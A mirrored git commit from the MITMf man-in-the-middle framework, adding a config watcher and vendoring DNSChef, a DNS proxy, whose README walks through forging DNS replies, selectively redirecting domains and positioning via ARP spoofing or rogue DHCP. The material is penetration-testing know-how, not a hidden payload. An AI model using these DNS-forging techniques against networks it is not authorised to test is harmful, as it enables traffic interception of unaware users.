mirror of
https://github.com/byt3bl33d3r/MITMf.git
synced 2025-07-16 10:03:52 -07:00
initial dynamic config support
added configwatcher.py
This commit is contained in:
parent
96eb4e2fa6
commit
663f38e732
26 changed files with 1187 additions and 281 deletions
3
.gitmodules
vendored
3
.gitmodules
vendored
|
@ -7,6 +7,3 @@
|
|||
[submodule "core/beefapi"]
|
||||
path = core/beefapi
|
||||
url = https://github.com/byt3bl33d3r/beefapi
|
||||
[submodule "libs/dnschef"]
|
||||
path = libs/dnschef
|
||||
url = https://github.com/byt3bl33d3r/dnschef
|
||||
|
|
12
README.md
12
README.md
|
@ -13,6 +13,13 @@ This tool is based on [sergio-proxy](https://github.com/supernothing/sergio-prox
|
|||
============================
|
||||
As of v0.9.6, the fork of the ```python-netfilterqueue``` library is no longer required.
|
||||
|
||||
How to install on Kali
|
||||
======================
|
||||
|
||||
```apt-get install mitmf```
|
||||
|
||||
**Currently Kali has a very old version of MITMf in its repos, please read the [Installation](#installation) section to get the latest version**
|
||||
|
||||
Installation
|
||||
============
|
||||
If MITMf is not in your distros repo or you just want the latest version:
|
||||
|
@ -79,8 +86,3 @@ If you find a *bug* please open an issue and include at least the following in t
|
|||
- OS your using
|
||||
|
||||
Also remember: Github markdown is your friend!
|
||||
|
||||
How to install on Kali
|
||||
======================
|
||||
|
||||
```apt-get install mitmf```
|
||||
|
|
|
@ -40,7 +40,7 @@
|
|||
nameservers = 8.8.8.8
|
||||
|
||||
[[[A]]] # Queries for IPv4 address records
|
||||
*.thesprawl.org=192.0.2.1
|
||||
*.thesprawls.org=192.0.2.1
|
||||
|
||||
[[[AAAA]]] # Queries for IPv6 address records
|
||||
*.thesprawl.org=2001:db8::1
|
||||
|
|
49
core/configwatcher.py
Normal file
49
core/configwatcher.py
Normal file
|
@ -0,0 +1,49 @@
|
|||
#! /usr/bin/env python2.7
|
||||
|
||||
import logging
|
||||
|
||||
logging.getLogger("watchdog").setLevel(logging.ERROR) #Disables watchdog's debug messages
|
||||
from watchdog.observers import Observer
|
||||
from watchdog.events import FileSystemEventHandler
|
||||
|
||||
from configobj import ConfigObj
|
||||
|
||||
mitmf_logger = logging.getLogger('mitmf')
|
||||
|
||||
class ConfigWatcher(FileSystemEventHandler):
    """Watches the MITMf configuration file and reloads it on changes.

    Singleton: obtain the shared instance through getInstance() rather than
    instantiating directly. Subclasses may override onConfigChange() to run
    custom logic after the configuration has been reloaded.
    """

    # Path of the watched configuration file (relative to the working dir)
    _CONFIG_PATH = "./config/mitmf.conf"

    _instance = None

    def __init__(self):

        # Initial parse of the configuration file
        self.config = ConfigObj(self._CONFIG_PATH)
        # Background watchdog observer; set by startConfigWatch()
        self.observer = None

    @staticmethod
    def getInstance():
        """Return the shared ConfigWatcher, creating it on first use."""
        if ConfigWatcher._instance is None:
            ConfigWatcher._instance = ConfigWatcher()

        return ConfigWatcher._instance

    def startConfigWatch(self):
        """Start a background observer watching the ./config directory."""
        observer = Observer()
        observer.schedule(self, path='./config', recursive=False)
        observer.start()
        # Keep a reference so the observer thread can be stopped later
        # (the original discarded it, making a clean shutdown impossible)
        self.observer = observer

    def stopConfigWatch(self):
        """Stop and join the observer started by startConfigWatch(), if any."""
        if self.observer is not None:
            self.observer.stop()
            self.observer.join()
            self.observer = None

    def getConfig(self):
        """Return the currently loaded ConfigObj."""
        return self.config

    def on_modified(self, event):
        # watchdog fires this for ANY file modified under ./config; only
        # react when the watched config file itself changed to avoid
        # spurious reloads (event.src_path per the watchdog events API)
        if not event.src_path.endswith("mitmf.conf"):
            return
        mitmf_logger.debug("[{}] Detected configuration changes, reloading!".format(self.__class__.__name__))
        self.reloadConfig()
        self.onConfigChange()

    def onConfigChange(self):
        """ We can subclass this function to do stuff after the config file has been modified"""
        pass

    def reloadConfig(self):
        """Re-parse the config file, logging (not raising) on failure."""
        try:
            self.config = ConfigObj(self._CONFIG_PATH)
        except Exception as e:
            # best-effort: keep the previously loaded config on parse errors
            mitmf_logger.warning("Error reloading config file: {}".format(e))
|
29
core/dnschef/CHANGELOG
Normal file
29
core/dnschef/CHANGELOG
Normal file
|
@ -0,0 +1,29 @@
|
|||
Version 0.3
|
||||
|
||||
* Added support for the latest version of the dnslib library - 0.9.3
|
||||
* Added support for logging. (idea by kafeine)
|
||||
* Added support for SRV, DNSKEY, and RRSIG records. (idea by mubix)
|
||||
* Added support for TCP remote nameserver connections. (idea by mubix)
|
||||
* DNS name matching is now case insensitive.
|
||||
* Various small bug fixes and performance tweaks.
|
||||
* Python libraries are no longer bundled with the distribution, but
|
||||
compiled in the Windows binary.
|
||||
|
||||
Version 0.2.1
|
||||
|
||||
* Fixed a Python 2.6 compatibility issue. (thanks Mehran Goudarzi)
|
||||
|
||||
Version 0.2
|
||||
|
||||
* Added IPv6 support.
|
||||
* Added AAAA, MX, CNAME, NS, SOA and NAPTR support.
|
||||
* Added support for ANY queries (returns all known fake records).
|
||||
* Changed file format to support more DNS record types.
|
||||
* Added alternative DNS port support (contributed by fnv).
|
||||
* Added alternative listening port support for the server (contributed by Mark Straver).
|
||||
* Updated bundled dnslib library to the latest version - 0.8.2.
|
||||
* Included IPy library for IPv6 support.
|
||||
|
||||
Version 0.1
|
||||
|
||||
* First public release
|
25
core/dnschef/LICENSE
Normal file
25
core/dnschef/LICENSE
Normal file
|
@ -0,0 +1,25 @@
|
|||
Copyright (C) 2014 Peter Kacherginsky
|
||||
All rights reserved.
|
||||
|
||||
Redistribution and use in source and binary forms, with or without
|
||||
modification, are permitted provided that the following conditions are met:
|
||||
|
||||
1. Redistributions of source code must retain the above copyright notice, this
|
||||
list of conditions and the following disclaimer.
|
||||
2. Redistributions in binary form must reproduce the above copyright notice,
|
||||
this list of conditions and the following disclaimer in the documentation
|
||||
and/or other materials provided with the distribution.
|
||||
3. Neither the name of the copyright holder nor the names of its contributors
|
||||
may be used to endorse or promote products derived from this software without
|
||||
specific prior written permission.
|
||||
|
||||
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
|
||||
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
|
||||
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
|
||||
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
|
||||
ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
|
||||
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
|
||||
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
|
||||
ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
|
||||
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
|
||||
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
|
339
core/dnschef/README.md
Normal file
339
core/dnschef/README.md
Normal file
|
@ -0,0 +1,339 @@
|
|||
DNSChef
|
||||
=======
|
||||
|
||||
The latest version of this document can be obtained from http://thesprawl.org/projects/dnschef/
|
||||
|
||||
DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka "Fake DNS") is a tool used for application network traffic analysis among other uses. For example, a DNS proxy can be used to fake requests for "badguy.com" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.
|
||||
|
||||
There are several DNS Proxies out there. Most will simply point all DNS queries a single IP address or implement only rudimentary filtering. DNSChef was developed as part of a penetration test where there was a need for a more configurable system. As a result, DNSChef is cross-platform application capable of forging responses based on inclusive and exclusive domain lists, supporting multiple DNS record types, matching domains with wildcards, proxying true responses for nonmatching domains, defining external configuration files, IPv6 and many other features. You can find detailed explanation of each of the features and suggested uses below.
|
||||
|
||||
The use of DNS Proxy is recommended in situations where it is not possible to force an application to use some other proxy server directly. For example, some mobile applications completely ignore OS HTTP Proxy settings. In these cases, the use of a DNS proxy server such as DNSChef will allow you to trick that application into forwarding connections to the desired destination.
|
||||
|
||||
Setting up a DNS Proxy
|
||||
======================
|
||||
|
||||
Before you can start using DNSChef, you must configure your machine to use a DNS nameserver with the tool running on it. You have several options based on the operating system you are going to use:
|
||||
|
||||
* **Linux** - Edit */etc/resolv.conf* to include a line on the very top with your traffic analysis host (e.g add "nameserver 127.0.0.1" if you are running locally). Alternatively, you can add a DNS server address using tools such as Network Manager. Inside the Network Manager open IPv4 Settings, select *Automatic (DHCP) addresses only* or *Manual* from the *Method* drop down box and edit *DNS Servers* text box to include an IP address with DNSChef running.
|
||||
|
||||
* **Windows** - Select *Network Connections* from the *Control Panel*. Next select one of the connections (e.g. "Local Area Connection"), right-click on it and select properties. From within a newly appearing dialog box, select *Internet Protocol (TCP/IP)* and click on properties. At last select *Use the following DNS server addresses* radio button and enter the IP address with DNSChef running. For example, if running locally enter 127.0.0.1.
|
||||
|
||||
* **OS X** - Open *System Preferences* and click on the *Network* icon. Select the active interface and fill in the *DNS Server* field. If you are using Airport then you will have to click on *Advanced...* button and edit DNS servers from there. Alternatively, you can edit */etc/resolv.conf* and add a fake nameserver to the very top there (e.g "nameserver 127.0.0.1").
|
||||
|
||||
* **iOS** - Open *Settings* and select *General*. Next select on *Wi-Fi* and click on a blue arrow to the right of an active Access Point from the list. Edit DNS entry to point to the host with DNSChef running. Make sure you have disabled Cellular interface (if available).
|
||||
|
||||
* **Android** - Open *Settings* and select *Wireless and network*. Click on *Wi-Fi settings* and select *Advanced* after pressing the *Options* button on the phone. Enable *Use static IP* checkbox and configure a custom DNS server.
|
||||
|
||||
If you do not have the ability to modify device's DNS settings manually, then you still have several options involving techniques such as [ARP Spoofing](http://en.wikipedia.org/wiki/ARP_spoofing), [Rogue DHCP](http://www.yersinia.net/doc.htm) and other creative methods.
|
||||
|
||||
At last you need to configure a fake service where DNSChef will point all of the requests. For example, if you are trying to intercept web traffic, you must bring up either a separate web server running on port 80 or set up a web proxy (e.g. Burp) to intercept traffic. DNSChef will point queries to your proxy/server host with properly configured services.
|
||||
|
||||
Running DNSChef
|
||||
===============
|
||||
|
||||
DNSChef is a cross-platform application developed in Python which should run on most platforms which have a Python interpreter. You can use the supplied *dnschef.exe* executable to run it on Windows hosts without installing a Python interpreter. This guide will concentrate on Unix environments; however, all of the examples below were tested to work on Windows as well.
|
||||
|
||||
Let's get a taste of DNSChef with its most basic monitoring functionality. Execute the following command as root (required to start a server on port 53):
|
||||
|
||||
# ./dnschef.py
|
||||
|
||||
_ _ __
|
||||
| | version 0.2 | | / _|
|
||||
__| |_ __ ___ ___| |__ ___| |_
|
||||
/ _` | '_ \/ __|/ __| '_ \ / _ \ _|
|
||||
| (_| | | | \__ \ (__| | | | __/ |
|
||||
\__,_|_| |_|___/\___|_| |_|\___|_|
|
||||
iphelix@thesprawl.org
|
||||
|
||||
[*] DNSChef started on interface: 127.0.0.1
|
||||
[*] Using the following nameservers: 8.8.8.8
|
||||
[*] No parameters were specified. Running in full proxy mode
|
||||
|
||||
|
||||
Without any parameters, DNSChef will run in full proxy mode. This means that all requests will simply be forwarded to an upstream DNS server (8.8.8.8 by default) and returned back to the querying host. For example, let's query an "A" record for a domain and observe results:
|
||||
|
||||
$ host -t A thesprawl.org
|
||||
thesprawl.org has address 108.59.3.64
|
||||
|
||||
DNSChef will print the following log line showing time, source IP address, type of record requested and most importantly which name was queried:
|
||||
|
||||
[23:54:03] 127.0.0.1: proxying the response of type 'A' for thesprawl.org
|
||||
|
||||
This mode is useful for simple application monitoring where you need to figure out which domains it uses for its communications.
|
||||
|
||||
DNSChef has full support for IPv6 which can be activated using *-6* or *--ipv6* flags. It works exactly as IPv4 mode with the exception that default listening interface is switched to ::1 and default DNS server is switched to 2001:4860:4860::8888. Here is a sample output:
|
||||
|
||||
# ./dnschef.py -6
|
||||
_ _ __
|
||||
| | version 0.2 | | / _|
|
||||
__| |_ __ ___ ___| |__ ___| |_
|
||||
/ _` | '_ \/ __|/ __| '_ \ / _ \ _|
|
||||
| (_| | | | \__ \ (__| | | | __/ |
|
||||
\__,_|_| |_|___/\___|_| |_|\___|_|
|
||||
iphelix@thesprawl.org
|
||||
|
||||
[*] Using IPv6 mode.
|
||||
[*] DNSChef started on interface: ::1
|
||||
[*] Using the following nameservers: 2001:4860:4860::8888
|
||||
[*] No parameters were specified. Running in full proxy mode
|
||||
[00:35:44] ::1: proxying the response of type 'A' for thesprawl.org
|
||||
[00:35:44] ::1: proxying the response of type 'AAAA' for thesprawl.org
|
||||
[00:35:44] ::1: proxying the response of type 'MX' for thesprawl.org
|
||||
|
||||
NOTE: By default, DNSChef creates a UDP listener. You can use TCP instead with the *--tcp* argument discussed later.
|
||||
|
||||
Intercept all responses
|
||||
-----------------------
|
||||
|
||||
Now, that you know how to start DNSChef let's configure it to fake all replies to point to 127.0.0.1 using the *--fakeip* parameter:
|
||||
|
||||
# ./dnschef.py --fakeip 127.0.0.1 -q
|
||||
[*] DNSChef started on interface: 127.0.0.1
|
||||
[*] Using the following nameservers: 8.8.8.8
|
||||
[*] Cooking all A replies to point to 127.0.0.1
|
||||
[23:55:57] 127.0.0.1: cooking the response of type 'A' for google.com to 127.0.0.1
|
||||
[23:55:57] 127.0.0.1: proxying the response of type 'AAAA' for google.com
|
||||
[23:55:57] 127.0.0.1: proxying the response of type 'MX' for google.com
|
||||
|
||||
In the above output you can see that DNSChef was configured to proxy all requests to 127.0.0.1. The first line of log at 08:11:23 shows that we have "cooked" the "A" record response to point to 127.0.0.1. However, further requests for 'AAAA' and 'MX' records are simply proxied from a real DNS server. Let's see the output from the requesting program:
|
||||
|
||||
$ host google.com localhost
|
||||
google.com has address 127.0.0.1
|
||||
google.com has IPv6 address 2001:4860:4001:803::1001
|
||||
google.com mail is handled by 10 aspmx.l.google.com.
|
||||
google.com mail is handled by 40 alt3.aspmx.l.google.com.
|
||||
google.com mail is handled by 30 alt2.aspmx.l.google.com.
|
||||
google.com mail is handled by 20 alt1.aspmx.l.google.com.
|
||||
google.com mail is handled by 50 alt4.aspmx.l.google.com.
|
||||
|
||||
As you can see the program was tricked to use 127.0.0.1 for the IPv4 address. However, the information obtained from IPv6 (AAAA) and mail (MX) records appears completely legitimate. The goal of DNSChef is to have the least impact on the correct operation of the program, so if an application relies on a specific mailserver it will correctly obtain one through this proxied request.
|
||||
|
||||
Let's fake one more request to illustrate how to target multiple records at the same time:
|
||||
|
||||
# ./dnschef.py --fakeip 127.0.0.1 --fakeipv6 ::1 -q
|
||||
[*] DNSChef started on interface: 127.0.0.1
|
||||
[*] Using the following nameservers: 8.8.8.8
|
||||
[*] Cooking all A replies to point to 127.0.0.1
|
||||
[*] Cooking all AAAA replies to point to ::1
|
||||
[00:02:14] 127.0.0.1: cooking the response of type 'A' for google.com to 127.0.0.1
|
||||
[00:02:14] 127.0.0.1: cooking the response of type 'AAAA' for google.com to ::1
|
||||
[00:02:14] 127.0.0.1: proxying the response of type 'MX' for google.com
|
||||
|
||||
In addition to the --fakeip flag, I have now specified --fakeipv6 designed to fake 'AAAA' record queries. Here is an updated program output:
|
||||
|
||||
$ host google.com localhost
|
||||
google.com has address 127.0.0.1
|
||||
google.com has IPv6 address ::1
|
||||
google.com mail is handled by 10 aspmx.l.google.com.
|
||||
google.com mail is handled by 40 alt3.aspmx.l.google.com.
|
||||
google.com mail is handled by 30 alt2.aspmx.l.google.com.
|
||||
google.com mail is handled by 20 alt1.aspmx.l.google.com.
|
||||
google.com mail is handled by 50 alt4.aspmx.l.google.com.
|
||||
|
||||
Once more all of the records not explicitly overridden by the application were proxied and returned from the real DNS server. However, IPv4 (A) and IPv6 (AAAA) were both faked to point to a local machine.
|
||||
|
||||
DNSChef supports multiple record types:
|
||||
|
||||
+--------+--------------+-----------+--------------------------+
|
||||
| Record | Description |Argument | Example |
|
||||
+--------+--------------+-----------+--------------------------+
|
||||
| A | IPv4 address |--fakeip | --fakeip 192.0.2.1 |
|
||||
| AAAA | IPv6 address |--fakeipv6 | --fakeipv6 2001:db8::1 |
|
||||
| MX | Mail server |--fakemail | --fakemail mail.fake.com |
|
||||
| CNAME | CNAME record |--fakealias| --fakealias www.fake.com |
|
||||
| NS | Name server |--fakens | --fakens ns.fake.com |
|
||||
+--------+--------------+-----------+--------------------------+
|
||||
|
||||
NOTE: For usability not all DNS record types are exposed on the command line. Additional records such as PTR, TXT, SOA, etc. can be specified using the --file flag and an appropriate record header. See the [external definitions file](#external-definitions-file) section below for details.
|
||||
|
||||
At last let's observe how the application handles queries of type ANY:
|
||||
|
||||
# ./dnschef.py --fakeip 127.0.0.1 --fakeipv6 ::1 --fakemail mail.fake.com --fakealias www.fake.com --fakens ns.fake.com -q
|
||||
[*] DNSChef started on interface: 127.0.0.1
|
||||
[*] Using the following nameservers: 8.8.8.8
|
||||
[*] Cooking all A replies to point to 127.0.0.1
|
||||
[*] Cooking all AAAA replies to point to ::1
|
||||
[*] Cooking all MX replies to point to mail.fake.com
|
||||
[*] Cooking all CNAME replies to point to www.fake.com
|
||||
[*] Cooking all NS replies to point to ns.fake.com
|
||||
[00:17:29] 127.0.0.1: cooking the response of type 'ANY' for google.com with all known fake records.
|
||||
|
||||
DNS ANY record queries results in DNSChef returning every faked record that it knows about for an applicable domain. Here is the output that the program will see:
|
||||
|
||||
$ host -t ANY google.com localhost
|
||||
google.com has address 127.0.0.1
|
||||
google.com has IPv6 address ::1
|
||||
google.com mail is handled by 10 mail.fake.com.
|
||||
google.com is an alias for www.fake.com.
|
||||
google.com name server ns.fake.com.
|
||||
|
||||
Filtering domains
|
||||
-----------------
|
||||
|
||||
Using the above example, consider you only want to intercept requests for *thesprawl.org* and leave queries to all other domains such as *webfaction.com* without modification. You can use the *--fakedomains* parameter as illustrated below:
|
||||
|
||||
# ./dnschef.py --fakeip 127.0.0.1 --fakedomains thesprawl.org -q
|
||||
[*] DNSChef started on interface: 127.0.0.1
|
||||
[*] Using the following nameservers: 8.8.8.8
|
||||
[*] Cooking replies to point to 127.0.0.1 matching: thesprawl.org
|
||||
[00:23:37] 127.0.0.1: cooking the response of type 'A' for thesprawl.org to 127.0.0.1
|
||||
[00:23:52] 127.0.0.1: proxying the response of type 'A' for mx9.webfaction.com
|
||||
|
||||
From the above example the request for *thesprawl.org* was faked; however, the request for *mx9.webfaction.com* was left alone. Filtering domains is very useful when you attempt to isolate a single application without breaking the rest.
|
||||
|
||||
NOTE: DNSChef will not verify whether the domain exists or not before faking the response. If you have specified a domain it will always resolve to a fake value whether it really exists or not.
|
||||
|
||||
Reverse filtering
|
||||
-----------------
|
||||
|
||||
In another situation you may need to fake responses for all requests except a defined list of domains. You can accomplish this task using the *--truedomains* parameter as follows:
|
||||
|
||||
# ./dnschef.py --fakeip 127.0.0.1 --truedomains thesprawl.org,*.webfaction.com -q
|
||||
[*] DNSChef started on interface: 127.0.0.1
|
||||
[*] Using the following nameservers: 8.8.8.8
|
||||
[*] Cooking replies to point to 127.0.0.1 not matching: *.webfaction.com, thesprawl.org
|
||||
[00:27:57] 127.0.0.1: proxying the response of type 'A' for mx9.webfaction.com
|
||||
[00:28:05] 127.0.0.1: cooking the response of type 'A' for google.com to 127.0.0.1
|
||||
|
||||
There are several things going on in the above example. First notice the use of a wildcard (*). All domains matching *.webfaction.com will be reverse matched and resolved to their true values. The request for 'google.com' returned 127.0.0.1 because it was not on the list of excluded domains.
|
||||
|
||||
NOTE: Wildcards are position specific. A mask of type *.thesprawl.org will match www.thesprawl.org but not www.test.thesprawl.org. However, a mask of type *.*.thesprawl.org will match thesprawl.org, www.thesprawl.org and www.test.thesprawl.org.
|
||||
|
||||
External definitions file
|
||||
-------------------------
|
||||
|
||||
There may be situations where defining a single fake DNS record for all matching domains may not be sufficient. You can use an external file with a collection of DOMAIN=RECORD pairs defining exactly where you want the request to go.
|
||||
|
||||
For example, let create the following definitions file and call it *dnschef.ini*:
|
||||
|
||||
[A]
|
||||
*.google.com=192.0.2.1
|
||||
thesprawl.org=192.0.2.2
|
||||
*.wordpress.*=192.0.2.3
|
||||
|
||||
Notice the section header [A], it defines the record type to DNSChef. Now let's carefully observe the output of multiple queries:
|
||||
|
||||
# ./dnschef.py --file dnschef.ini -q
|
||||
[*] DNSChef started on interface: 127.0.0.1
|
||||
[*] Using the following nameservers: 8.8.8.8
|
||||
[+] Cooking A replies for domain *.google.com with '192.0.2.1'
|
||||
[+] Cooking A replies for domain thesprawl.org with '192.0.2.2'
|
||||
[+] Cooking A replies for domain *.wordpress.* with '192.0.2.3'
|
||||
[00:43:54] 127.0.0.1: cooking the response of type 'A' for google.com to 192.0.2.1
|
||||
[00:44:05] 127.0.0.1: cooking the response of type 'A' for www.google.com to 192.0.2.1
|
||||
[00:44:19] 127.0.0.1: cooking the response of type 'A' for thesprawl.org to 192.0.2.2
|
||||
[00:44:29] 127.0.0.1: proxying the response of type 'A' for www.thesprawl.org
|
||||
[00:44:40] 127.0.0.1: cooking the response of type 'A' for www.wordpress.org to 192.0.2.3
|
||||
[00:44:51] 127.0.0.1: cooking the response of type 'A' for wordpress.com to 192.0.2.3
|
||||
[00:45:02] 127.0.0.1: proxying the response of type 'A' for slashdot.org
|
||||
|
||||
Both *google.com* and *www.google.com* matched the *\*.google.com* entry and correctly resolved to *192.0.2.1*. On the other hand *www.thesprawl.org* request was simply proxied instead of being modified. At last all variations of *wordpress.com*, *www.wordpress.org*, etc. matched the *\*.wordpress.\** mask and correctly resolved to *192.0.2.3*. At last an undefined *slashdot.org* query was simply proxied with a real response.
|
||||
|
||||
You can specify section headers for all other supported DNS record types including the ones not explicitly exposed on the command line: [A], [AAAA], [MX], [NS], [CNAME], [PTR], [NAPTR] and [SOA]. For example, let's define a new [PTR] section in the 'dnschef.ini' file:
|
||||
|
||||
[PTR]
|
||||
*.2.0.192.in-addr.arpa=fake.com
|
||||
|
||||
Let's observe DNSChef's behavior with this new record type:
|
||||
|
||||
./dnschef.py --file dnschef.ini -q
|
||||
[sudo] password for iphelix:
|
||||
[*] DNSChef started on interface: 127.0.0.1
|
||||
[*] Using the following nameservers: 8.8.8.8
|
||||
[+] Cooking PTR replies for domain *.2.0.192.in-addr.arpa with 'fake.com'
|
||||
[00:11:34] 127.0.0.1: cooking the response of type 'PTR' for 1.2.0.192.in-addr.arpa to fake.com
|
||||
|
||||
And here is what a client might see when performing reverse DNS queries:
|
||||
|
||||
$ host 192.0.2.1 localhost
|
||||
1.2.0.192.in-addr.arpa domain name pointer fake.com.
|
||||
|
||||
Some records require exact formatting. Good examples are SOA and NAPTR
|
||||
|
||||
[SOA]
|
||||
*.thesprawl.org=ns.fake.com. hostmaster.fake.com. 1 10800 3600 604800 3600
|
||||
|
||||
[NAPTR]
|
||||
*.thesprawl.org=100 10 U E2U+sip !^.*$!sip:customer-service@fake.com! .
|
||||
|
||||
See sample dnschef.ini file for additional examples.
|
||||
|
||||
Advanced Filtering
|
||||
------------------
|
||||
|
||||
You can mix and match input from a file and command line. For example the following command uses both *--file* and *--fakedomains* parameters:
|
||||
|
||||
# ./dnschef.py --file dnschef.ini --fakeip 6.6.6.6 --fakedomains=thesprawl.org,slashdot.org -q
|
||||
[*] DNSChef started on interface: 127.0.0.1
|
||||
[*] Using the following nameservers: 8.8.8.8
|
||||
[+] Cooking A replies for domain *.google.com with '192.0.2.1'
|
||||
[+] Cooking A replies for domain thesprawl.org with '192.0.2.2'
|
||||
[+] Cooking A replies for domain *.wordpress.* with '192.0.2.3'
|
||||
[*] Cooking A replies to point to 6.6.6.6 matching: *.wordpress.*, *.google.com, thesprawl.org
|
||||
[*] Cooking A replies to point to 6.6.6.6 matching: slashdot.org, *.wordpress.*, *.google.com, thesprawl.org
|
||||
[00:49:05] 127.0.0.1: cooking the response of type 'A' for google.com to 192.0.2.1
|
||||
[00:49:15] 127.0.0.1: cooking the response of type 'A' for slashdot.org to 6.6.6.6
|
||||
[00:49:31] 127.0.0.1: cooking the response of type 'A' for thesprawl.org to 6.6.6.6
|
||||
[00:50:08] 127.0.0.1: proxying the response of type 'A' for tor.com
|
||||
|
||||
Notice the definition for *thesprawl.org* in the command line parameter took precedence over *dnschef.ini*. This could be useful if you want to override values in the configuration file. slashdot.org still resolves to the fake IP address because it was specified in the *--fakedomains* parameter. tor.com request is simply proxied since it was not specified in either command line or the configuration file.
|
||||
|
||||
Other configurations
|
||||
====================
|
||||
|
||||
For security reasons, DNSChef listens on a local 127.0.0.1 (or ::1 for IPv6) interface by default. You can make DNSChef listen on another interface using the *--interface* parameter:
|
||||
|
||||
# ./dnschef.py --interface 0.0.0.0 -q
|
||||
[*] DNSChef started on interface: 0.0.0.0
|
||||
[*] Using the following nameservers: 8.8.8.8
|
||||
[*] No parameters were specified. Running in full proxy mode
|
||||
[00:50:53] 192.0.2.105: proxying the response of type 'A' for thesprawl.org
|
||||
|
||||
or for IPv6:
|
||||
|
||||
# ./dnschef.py -6 --interface :: -q
|
||||
[*] Using IPv6 mode.
|
||||
[*] DNSChef started on interface: ::
|
||||
[*] Using the following nameservers: 2001:4860:4860::8888
|
||||
[*] No parameters were specified. Running in full proxy mode
|
||||
[00:57:46] 2001:db8::105: proxying the response of type 'A' for thesprawl.org
|
||||
|
||||
By default, DNSChef uses Google's public DNS server to make proxy requests. However, you can define a custom list of nameservers using the *--nameservers* parameter:
|
||||
|
||||
# ./dnschef.py --nameservers 4.2.2.1,4.2.2.2 -q
|
||||
[*] DNSChef started on interface: 127.0.0.1
|
||||
[*] Using the following nameservers: 4.2.2.1, 4.2.2.2
|
||||
[*] No parameters were specified. Running in full proxy mode
|
||||
[00:55:08] 127.0.0.1: proxying the response of type 'A' for thesprawl.org
|
||||
|
||||
It is possible to specify non-standard nameserver port using IP#PORT notation:
|
||||
|
||||
# ./dnschef.py --nameservers 192.0.2.2#5353 -q
|
||||
[*] DNSChef started on interface: 127.0.0.1
|
||||
[*] Using the following nameservers: 192.0.2.2#5353
|
||||
[*] No parameters were specified. Running in full proxy mode
|
||||
[02:03:12] 127.0.0.1: proxying the response of type 'A' for thesprawl.org
|
||||
|
||||
At the same time it is possible to start DNSChef itself on an alternative port using the *-p port#* parameter:
|
||||
|
||||
# ./dnschef.py -p 5353 -q
|
||||
[*] Listening on an alternative port 5353
|
||||
[*] DNSChef started on interface: 127.0.0.1
|
||||
[*] Using the following nameservers: 8.8.8.8
|
||||
[*] No parameters were specified. Running in full proxy mode
|
||||
|
||||
DNS protocol can be used over UDP (default) or TCP. DNSChef implements a TCP mode which can be activated with the *--tcp* flag.
|
||||
|
||||
Internal architecture
|
||||
=====================
|
||||
|
||||
Here is some information on the internals in case you need to adapt the tool for your needs. DNSChef is built on top of the SocketServer module and uses threading to help process multiple requests simultaneously. The tool is designed to listen on TCP or UDP ports (default is port 53) for incoming requests and forward those requests when necessary to a real DNS server over UDP.
|
||||
|
||||
The excellent [dnslib library](https://bitbucket.org/paulc/dnslib/wiki/Home) is used to dissect and reassemble DNS packets. It is particularly useful when generating response packets based on queries. [IPy](https://github.com/haypo/python-ipy/) is used for IPv6 addresses manipulation. Both libraries come bundled with DNSChef to ease installation.
|
||||
|
||||
DNSChef is capable of modifying queries for records of type "A", "AAAA", "MX", "CNAME", "NS", "TXT", "PTR", "NAPTR", "SOA", "ANY". It is very easy to expand or modify behavior for any record. Simply add another **if qtype == "RECORD TYPE")** entry and tell it what to reply with.
|
||||
|
||||
Enjoy the tool and forward all requests and comments to iphelix [at] thesprawl.org.
|
||||
|
||||
Happy hacking!
|
||||
-Peter
|
0
core/dnschef/__init__.py
Normal file
0
core/dnschef/__init__.py
Normal file
502
core/dnschef/dnschef.py
Executable file
502
core/dnschef/dnschef.py
Executable file
|
@ -0,0 +1,502 @@
|
|||
#!/usr/bin/env python2.7
|
||||
#
|
||||
# DNSChef is a highly configurable DNS Proxy for Penetration Testers
|
||||
# and Malware Analysts. Please visit http://thesprawl.org/projects/dnschef/
|
||||
# for the latest version and documentation. Please forward all issues and
|
||||
# concerns to iphelix [at] thesprawl.org.
|
||||
|
||||
# Copyright (C) 2015 Peter Kacherginsky, Marcello Salvati
|
||||
# All rights reserved.
|
||||
#
|
||||
# Redistribution and use in source and binary forms, with or without
|
||||
# modification, are permitted provided that the following conditions are met:
|
||||
#
|
||||
# 1. Redistributions of source code must retain the above copyright notice, this
|
||||
# list of conditions and the following disclaimer.
|
||||
# 2. Redistributions in binary form must reproduce the above copyright notice,
|
||||
# this list of conditions and the following disclaimer in the documentation
|
||||
# and/or other materials provided with the distribution.
|
||||
# 3. Neither the name of the copyright holder nor the names of its contributors
|
||||
# may be used to endorse or promote products derived from this software without
|
||||
# specific prior written permission.
|
||||
#
|
||||
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
|
||||
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
|
||||
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
|
||||
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
|
||||
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
|
||||
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
|
||||
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
|
||||
